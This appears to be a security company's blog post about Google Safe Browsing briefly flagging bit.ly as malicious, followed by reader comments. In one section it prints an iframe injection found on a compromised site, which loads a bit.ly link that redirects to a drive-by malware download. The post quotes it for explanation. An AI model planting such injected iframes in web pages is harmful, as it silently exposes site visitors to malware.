Google Blacklists Bit.ly

If you ever shortened a URL using bit.ly or if you use it anywhere, be aware that Google recently blacklisted all bit.ly pages through its Safe Browsing program. It means that anyone using Chrome, Firefox or Safari will get a nasty The site ahead contains malware warning when visiting a bit.ly link:

Screen Shot 2014-10-25 at 10.23.45 AM

Why would Google blacklist bit.ly?

Google has many automated processes to detect if a specific domain is hosting malware, redirecting to malware or somehow being misused to compromise other sites (as an intermediary). It flags thousands of sites every day and it seems that the bit.ly had some redirections that were flagged by their detection process.

This is what their diagnostics page say:

What is the current listing status for bit.ly? Site is listed as suspicious – visiting this web site may harm your computer.

Of the 91549 pages we tested on the site over the past 90 days, 721 page(s) resulted in malicious software being downloaded and installed without user consent.

That generally means that someone shortened a URL that was redirecting to a browser exploit kit that was pushing malware to the visitors visiting this page.

Shortened URL malware

Unfortunately, Google is not completely wrong with this one (but likely a bit excessive, time will tell). We constantly see malware injection on websites leveraging shortened URL links. Here is an example of what we mean, this payload was found in a compromised website:

<iframe src="http://bit.ly/1qJGlE0"nbsp;
name="iframe_name" scrolling="no" frameborder="0" allowfullscreen align="top" height="400px" width="720px">

This iframe injection has a bit.ly link that redirects to a drive-by-download hosted at httx://teamliboza[.]nl/streamplayer1.php. It happens often with bit.ly and other URL shortens. This new blacklisting status could be a change in tide for URL shorteners as Google takes a hard stance against how attackers employ them to distribute malware. That or they could be legitimately blocked, it’s just hard to say at the moment.

Whether they are actually hacked or being tagged for what others are doing will require more time and analysis as it’s a very unique situation. For now however, if you depend on the shortening service, if you want people to see your content it’s best to avoid the service until the issue has been resolved.

Additionally, if you leverage the shortener in your own website this could be impactful to you as your website could get inadvertently blacklisted for loading a blacklisted website. Something to be mindful of. The good news is that the blacklist will be for the shortener, so removing it will address the problem, but the bad news is that most end-users won’t read the details and assume it’s you.

We will keep monitoring this issue closely and we will post an update as soon as we hear more. In the mean time, do not visit bit.ly links and replace them with their real final destination URL.

Update 1: After almost 12 hours, Google removed the ban from Bit.ly. They also changed the diagnostics page to:

What is the current listing status for bit.ly?
This site is not currently listed as suspicious.

18 comments
  1. Interesting. I’ve been wondering when (if) this would ever happen. I’m even more curious to know what would happen if Google’s own URL shortner goo.gl was involved.

  2. Thanks for the heads up. I use Bit.ly with a custom domain and have it set up in Tweetdeck and on my site via the WooThemes plugin WooDojo Shortlinks. I assume I should turn these off until further notice …. thanks!

  3. Do you know if the same warning will apply for sites using their own URL’s through bit.ly? I’ve purchased a domain name for this purpose but haven’t set it up yet; I’m wondering if this might be a good time to do that!

  4. This is SUCH a P.I.T.A.! I have Biy.ly links ALL over my site and now the Grand-Goog’ has decided that a legitimate service is malicious and my connected relationship my site could be malicious ?!?! AHH!

    I get it that google is looking for problems and HOPEFULLY Bit.ly will sort out the Issues ASAP. One or two bad apples can really spoil the entire truckload of GOOD ones.

    How do you feel this will shake out?
    Do we need to move to another URL shortening service to avoid this mess?
    Do you feel that Bit.ly “could” fix the issue and return all GOOD sites back to “safe” status?

    Thank you for all your vigilant work, PLEASE keep this issue updated on your blog, I for one am tracking this with A-1 priority! 😀

    Thank You

    1. All my redirects on Facebook are not working, twitter is okay, but all the ones on my work page, are still being flagged

  5. I’d wish Matt Cutts come here and answer that 🙂 I bet they would receive an alert before goo.gl were about to be blocked, to create exceptions and do not block theirselves, or maybe not? 😀

    1. They penalized themselves multiple times. Most notably the time a few years ago when Google Japan tried to get Japanese bloggers to create Google-centric content and try to push past Yahoo! Japan in market share.

  6. I’d like to know a way to banish this company from using, sharing, or selling my email address before I turn them in to the FCC. I’m sick of getting 2-300 spam EMAILS a day!!! Really pisses me off!!! If Google is allowing tell me!! I’ll deal with them first……

Comments are closed.

You May Also Like